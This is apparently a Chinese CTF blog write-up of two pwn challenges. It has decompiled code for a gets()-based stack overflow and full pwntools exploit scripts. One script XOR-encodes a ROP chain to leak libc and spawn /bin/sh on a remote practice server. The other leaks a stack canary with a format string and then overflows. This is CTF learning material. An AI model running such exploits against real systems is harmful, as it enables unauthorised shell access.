昨天做了几道pwn题emem
今天也做了2道表示pwn好难被打自闭了…
昨天重新做了一下国赛的pwn题发现好像能做几道…当时的自己也是真的菜~~
pwn1就是常规思路泄露libc然后getshell
// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+Ch] [rbp-4h]
init(*(_QWORD *)&argc, argv, envp);
puts("EEEEEEE hh iii ");
puts("EE mm mm mmmm aa aa cccc hh nn nnn eee ");
puts("EEEEE mmm mm mm aa aaa cc hhhhhh iii nnn nn ee e ");
puts("EE mmm mm mm aa aaa cc hh hh iii nn nn eeeee ");
puts("EEEEEEE mmm mm mm aaa aa ccccc hh hh iii nn nn eeeee ");
puts("====================================================================");
puts("Welcome to this Encryption machine\n");
begin("Welcome to this Encryption machine\n");
while ( 1 )
{
while ( 1 )
{
fflush(0LL);
v4 = 0;
__isoc99_scanf("%d", &v4);
getchar();
if ( v4 != 2 )
break;
puts("I think you can do it by yourself");
begin("I think you can do it by yourself");
}
if ( v4 == 3 )
{
puts("Bye!");
return 0;
}
if ( v4 != 1 )
break;
encrypt();
begin("%d");
}
puts("Something Wrong!");
return 0;
}
是一个表单的pwn我们进入加密函数
int encrypt()
{
size_t v0; // rbx
char s[48]; // [rsp+0h] [rbp-50h]
__int16 v3; // [rsp+30h] [rbp-20h]
memset(s, 0, sizeof(s));
v3 = 0;
puts("Input your Plaintext to be encrypted");
gets(s);
while ( 1 )
{
v0 = (unsigned int)x;
if ( v0 >= strlen(s) )
break;
if ( s[x] <= 96 || s[x] > 122 )
{
if ( s[x] <= 64 || s[x] > 90 )
{
if ( s[x] > 47 && s[x] <= 57 )
s[x] ^= 0xFu;
}
else
{
s[x] ^= 0xEu;
}
}
else
{
s[x] ^= 0xDu;
}
++x;
}
puts("Ciphertext");
return puts(s);
}
很明显的缓冲区溢出漏洞只是传上去会被加密所以我们把其用同样方式异或一下就会出来了然后泄露libc找system地址,找’/bin/sh’,或者用one_gadget(这个我没有试)…
泄露的函数的话有puts就直接用它呗
直接上exp:
from pwn import *
libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
p=remote('pwn.buuoj.cn',20123)
main_addr = 0x000000000400B28
pop_rdi_addr = 0x0000000000400c83
offset=0x50+8
elf=ELF('./ciscn1')
p.recvuntil('your choice!')
p.sendline('1')
p.recvuntil('be encrypted')
payload='a'*offset+p64(pop_rdi_addr)+p64(elf.got['puts'])
payload+=p64(elf.plt['puts'])+p64(main_addr)
payload_change=''
for x in payload:
if ord(x)<=96 or ord(x)>122:
if ord(x)<=64 or ord(x)>90:
if ord(x)>47 and ord(x)<=57:
x=chr(ord(x)^0xf)
else:
x=chr(ord(x)^0xe)
else:
x=chr(ord(x)^0xd)
payload_change+=x
print payload_change
p.sendline(payload_change)
p.recvuntil('Ciphertext\n')
p.recvuntil('\n',drop=True)
put_addr=u64(p.recvuntil('\n',drop=True)+"\x00\x00") #这里用DEBUG调试可知
print put_addr
#getshell
libcbase=put_addr-libc.symbols['puts']
system_addr=libcbase+libc.symbols['system']
bin_sh=libcbase+libc.search("/bin/sh").next()
payload2='a'*offset+p64(pop_rdi_addr)+p64(bin_sh)+p64(system_addr)
p.recvuntil('your choice!')
p.sendline('1')
p.recvuntil('be encrypted')
p.sendline(payload2)
p.interactive()
emem这么简单没做出来~~
然后就是记不清是哪个网站上的一道题目好像先是用格式化字符串泄露cannary然后直接栈溢出
#coding:utf-8
#canary与我们输入参数的偏移为0x90 - 8 = 0x88,然后八个字节为一组,0x88 / 8 = 17,17 + 6 = 23
from pwn import *
#context.log_level = 'debug'
#p = process('./mark')
p=remote('111.198.29.45',54792)
#leak canary
p.recvuntil('3. Exit the battle')
p.sendline('2')
p.sendline("%23$p")
p.recvuntil('0x')
canary=int(p.recv(16),16)
#getshell
flag_addr=0x04008DA
p.sendline('1')
payload='a'*0x88
payload+=p64(canary)
payload+='b'*8
payload+=p64(flag_addr)
p.sendline(payload)
p.interactive()
哇哇pwn好难